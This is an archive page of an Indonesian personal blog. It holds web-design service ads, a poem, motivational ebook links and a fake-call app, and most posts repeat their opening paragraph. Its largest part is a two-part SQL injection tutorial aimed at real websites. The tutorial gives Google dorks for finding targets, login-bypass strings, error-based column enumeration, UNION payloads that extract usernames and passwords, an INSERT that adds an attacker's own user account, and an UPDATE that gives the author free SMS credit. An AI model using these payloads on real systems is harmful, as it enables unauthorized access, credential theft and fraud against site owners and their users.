Kamis, 11 Maret 2010

spesifikasi web dinamis

Karena Banyaknya permintaan spesifikasi web dinamis maka saya akan memperjelasnya...

WEBSITE DYNAMIC

KAPASITAS : 1GB
BANDWITH : 50 GB
Database : UNLIMITED
WEBMAIL : UNLIMITED
PAGE : 25 - 30 Page
HARGA : Rp 3.500.000 s/d Rp. 6.000.000

Bagi anda yang berminat silahkan kirim email ke saya
dzinnerjoe@yahoo.com
jordanfransisco@yahoo.com
contact person
021-93008928
085697432892

Thx....

Baca Selengkapnya.....

Coretan Ga penting!!!!


Berawal dari mana aku menulis dan berawal dari kebimbangan akan hidup ini..
semua penuh dengan perpekstif deskriptif dan semua dengan sandiwara
tidak ada yang sempurna dibalik kesempurnaan itu
tidak ada yang buruk dibalik keburukan itu

Berawal dari mana aku menulis dan berawal dari kebimbangan akan hidup ini..
semua penuh dengan perpekstif deskriptif dan semua dengan sandiwara
tidak ada yang sempurna dibalik kesempurnaan itu
tidak ada yang buruk dibalik keburukan itu

hanya kita dan kita yang terlahir disini
bukan dia dan juga bukan aku
bukan kamu dan juga bukan mereka
bukan hati dan juga bukan jiwa

ketika semua tidak bermakna lagi
apakah arti dari sebuah makna
ketika semua tidak terarah
apalah makna dari sebuah arah

seorang duduk terdiam melihat tingkah dan perilakunya
tidak ada yang dapat tersudut dan disudutkan
ketika kita mencoba lari dari sudut itu
setajam apapun sudut itu menusuk jantungmu maka gunakan hatimu

tidak ada kematian didalam kehidupan
tetapi ada kehidupan didalam kematian

Baca Selengkapnya.....

Selasa, 16 Februari 2010

Kerjaan Ku Saat Ini....Hayo Mo Order ga

Ups dah lama ga ngeblogger ane sekarang mo nawarin neh jasa pembuatan website statik. dinamik juga bisa sich ga menutup kemungkinan juga tapi yach gitu pembuatan web dinamis harganya agak mahal bagi ane.....


Ups dah lama ga ngeblogger ane sekarang mo nawarin neh jasa pembuatan website statik. dinamik juga bisa sich ga menutup kemungkinan juga tapi yach gitu pembuatan web dinamik harganya agak mahal bagi ane.....

Nah langsung aja deh klo mo buat website statik buat profil kalian semua yang punya usaha dagang, ataupun usaha jasa. klo mo buat website statik yach bisa buat sama ane..untuk harga website statik --> Rp 1.750.000,- s/d 1.800.000,- pasti pada mo pilih yang Rp 1.750.000,- heheh iya deh itu sich terserah kalian aja deh..
Spesifikasinya mo tau ga neh....yang jelas dah satu paket sama DOMAIN, HOSTING 250Mb-500Mb, abondemen per tahun kok sekitar Rp 120.000,- yach ibaratkan aja deh Kalian Beli Rumah Masa Ga Bayar Pajak Sich....

Untuk Cara Pembayaran hmmm
DP 50% dibayar dimuka --> keterangan lebih lanjut contact Ane aja yach
TIDAK DIBENARKAN BAYAR LUNAS lho.....
Klo dah jadi nanti dikirim invoice sama username and password cpanelnya...
so milik kalian sendiri..nanti untuk awal kita bimbing kok...

Contact Person
jordanfransisco@yahoo.com <---Email Yahoo and YM
021-93008928
085697432892

ok kenapa mesti ragu lagi...coba deh bandingkan dengan harga2 yang lainnya....
ups ketinggalan untuk website dinamis <---contact langsung....

portofolio...
www.syarifahbanun.com
www.nutrisilangsing.com
www.saharacollection.com
www.griyaannur.com
www.dstarcrepes.com
www.tienanugrahjaya.com
www.purilaundy.com
www.mtsalfalah.com
www.rumahchantique21.com

neh satu yang dinamis
www.dsignnnce.com



Baca Selengkapnya.....

Minggu, 25 Oktober 2009

SQL INJECTION JUST 4 LEARNING!!!!! PART 2

:::PREFACE::.
============
Kalau di PART 1 dah dibahas teknik UPDATE di MS-SQL maka disini gw jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya kalau baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga akan kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan yang lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu browsernya agar bisa melihat errornya. Setting di Tools-Internet option-Advanced tab-Show friendly HTTP error messages. itu musti dilakukan, kalau tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi artikel PART 1 :)



:::PREFACE::.
============
Kalau di PART 1 dah dibahas teknik UPDATE di MS-SQL maka disini gw jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya kalau baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga akan kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan yang lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu browsernya agar bisa melihat errornya. Setting di Tools-Internet option-Advanced tab-Show friendly HTTP error messages. itu musti dilakukan, kalau tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi artikel PART 1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di input boxnya :


www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln engganya tuh situs kita ketikan ' having 1=1-- di input box atau URL error tadi , contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table Users, stringnya : ' group by UserID --

then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini stringnya adalah ' group by field1,field2 --
contoh : ' group by UserID,ClientName --

then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai semua field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :) apabila sudah lama melakukan looping dan akhirnya ketika group terakhir kita lakukan dan tidak keluar error messagesnya maka error yang terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali, tergantung admin yang masangnya jadi susah kalau maen teabk2an ajah....contoh field yang pernah gw temuin :
' group by UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
, OperatingSystem, PrefferredGraphi cFormat -- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari siapa aja user yang ada dalam table Users dan kolom UserName... caranya? kita pake Union apa itu UNION??? union adalah perintah SQL dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen gunain Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah kalau begitu kita masukin syntax sql union untuk melihat username :
' union select min(UserName) ,1,1,1 from Users where username > 'a'-- jadi hasilnya : select * from Users where UserName ==' union select min(UserName) ,1,1,1 from Users where username > 'a'--and Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error messages lagi yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake string union tadi nanti akan muncul username2 lain....lalu bagaimana dengan passwordnya? ??
ok union beraksi kembali : ' union select min (UserName),1, 1,1,1,1,1, 1,1 from Users where username > 'Agile'-- lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. .... caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,' a@a.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it ',1)-- >> artinya kita masukan id kita dalam urutan 0, lalu username 'lucifer', password 'lucifer' Fname (frontName) itu 'lu', Lname(LastName) sebagai 'cid', dan EmailAddress ' a@a.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it '...... coba kita login dengan user buatan kita tadi....BINGO! selamat anda berhasil menjebol database situs target.....



Baca Selengkapnya.....

SQL INJECTION JUST 4 LEARNING!!!!! PART 1

::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalamteknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan lain lain. Diantara jenis lainnya MS-SQL adalah yang paling terkenal, nah ternyata semua hal yang di jagad maya ini adalah Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target dalam hal ini.


::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalamteknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan lain lain. Diantara jenis lainnya MS-SQL adalah yang paling terkenal, nah ternyata semua hal yang di jagad maya ini adalah Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe untuk menginject sql ini anda perlu memperhatikan input-inputan dalam situs itu yang sekiranya connect dengan SQL database situs itu, atau bisa juga dengan menambah dari link url di kotak browser anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari target yang vuln seperti kondisi diatas anda perlu mencarinya yang .asp nah seperti biasa....GOOGLING! !! hehehe key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa jauh anda kreatif dalam mencari target di google.nah, kanre disini gw bahas cara inject ke situs web to sms so searchnya : asp,web to sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan yang masuk ke database itu ga, misalnya search product, member login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya connect ke database situs itu, contoh isa di login, member, search, dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject, kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi dungs? ok kita loop lagi sekarang kita inject : ' group by UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini kita gunain perintah group by untuk menggroup kolom ingin kita lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe penerapan selanjutanya adalah misal situs itu adalah situs pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms dari web, namun harus ada account yang digunakan untuk mengirim sms itu, jadi account itu harus ada nilainya dan untuk itu kita harus mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe so kita inject aja....sebelumnya kita harus jadi member kan gratis ini daftarnya... setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log ke situs itu dengan id kita, cari tahu string khusus yang digunakan web itu untuk menghitung account sms kita, misalnya : cell nah, inilah injectnya... .cari login inputan lagi misal /member.asp nah disitu ada input box id dan pass...kita Inject dengan :

' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]= '[char_id]'- -

contoh :

' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)

sep, nah klo muncul error : userid not found kita isa cari input di forgot password : dengan inputan sama...jreeen ketika di jalankan ga ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES BRO!!! :)

Baca Selengkapnya.....

Minggu, 18 Oktober 2009

Beberapa Ebook Motivasi Sukses

Sukses yang kita dapatkan haruslah dengan berkerja keras dan juga kita harus bisa menyaring bahkan kita bisa bersikap tuli terhadap semua hal yang mendeskriditkan kita dan juga membuat kita merasa jatuh dan juga membuat kita menjadi pesimis sehingga tidak yakin atas hal yang kita lakukan..

Sukses yang kita dapatkan haruslah dengan berkerja keras dan juga kita harus bisa menyaring bahkan kita bisa bersikap tuli terhadap semua hal yang mendeskriditkan kita dan juga membuat kita merasa jatuh dan juga membuat kita menjadi pesimis sehingga tidak yakin atas hal yang kita lakukan..
sepertihalnya ada cerita tentang katak menuju tiang tertinggi. dimana pada waktu itu ada lomba antara katak-katak dan ada satu katak kecil yang dideskriditkan oleh katak-katak yang besar dan sehingga pada waktu perlombaan dimulai banyak katak2 yang kewalahan dan katak itu pun juga kewalahan tetapi dia tetap berkerja keras untuk menuju puncak tertinggi dan akhirnya katak tersebut sampai pada puncak dan ketika sudah selesai katak-katak yang lain bertanya bagaimana caramu mencapai puncak dan katak itu menjawab saya TULI dan BERKERJA KERAS....

sedot disini -->
tips memotivasi diri
Personal Winning

i have dream martin luther


10 penyakit mental

kisah 3 pencuri

Baca Selengkapnya.....

Rabu, 14 Oktober 2009

Sofware Fakecall buat BB OS 4 ke atas...

ini aplikasi lumayan lah buat iseng2
jadi bagi kalian Pengguna BB gw share deh


ini aplikasi lumayan lah buat iseng2
jadi bagi kalian Pengguna BB gw share deh

sedoot disini....

Baca Selengkapnya.....